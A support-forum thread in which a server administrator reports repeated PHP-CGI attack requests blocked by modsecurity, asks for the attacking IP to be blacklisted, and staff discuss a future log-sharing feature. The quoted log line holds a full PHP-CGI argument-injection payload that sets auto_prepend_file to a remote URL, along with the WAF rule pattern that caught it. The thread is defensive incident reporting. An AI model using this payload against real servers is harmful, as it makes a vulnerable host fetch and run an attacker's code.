Hi,

I'm getting a few of these every hour. Easily caught by modsecurity, but maybe the IP, should be blacklisted in the honeybot?

The info.txt from http://81.17.24.83/info3.txt is just some numbers, probably something useful (PHP-CGI vulnerability)...

[modsecurity] [client 2.24.23.149] [domain domainname.se] [403] [/20120614/20120614-2044/20120614-204457-GJ-Ze38AAAEAABEP8EMAAAAP] [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "493"] [id "340165"] [rev "277"] [msg "Atomicorp.com WAF Rules: Uniencoded possible Remote File Injection attempt in URI (AE)"] [data "/index.php?-dsafe_mode=off -ddisable_functions=null -dallow_url_fopen=on -dallow_url_include=on -dauto_prepend_file=http://81.17.24.83/info3.txt"] [severity "CRITICAL"] Access denied with code 403 (phase 2). Pattern match "=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?)://" at REQUEST_URI.

Added.

Thanks!

Right. I've had 1000s of these for weeks now.

This goes to show that I should have done something about it rather than just ignored them (they were, after all, being blocked).

Mike and Scott - you mentioned some form of collaborative data gathering system in a future version of ASL. Is this still on the cards? I'm imagining logs fragments being gathered and sent back to HQ every so often? I could then sit back and assume that someone would notice these oddities and do something about it, without me having to do anything at all except pay for a little bandwidth.

Yep. Once we get finished with the new firewall system we're going to put some time towards this new feature.

We've started working on this now.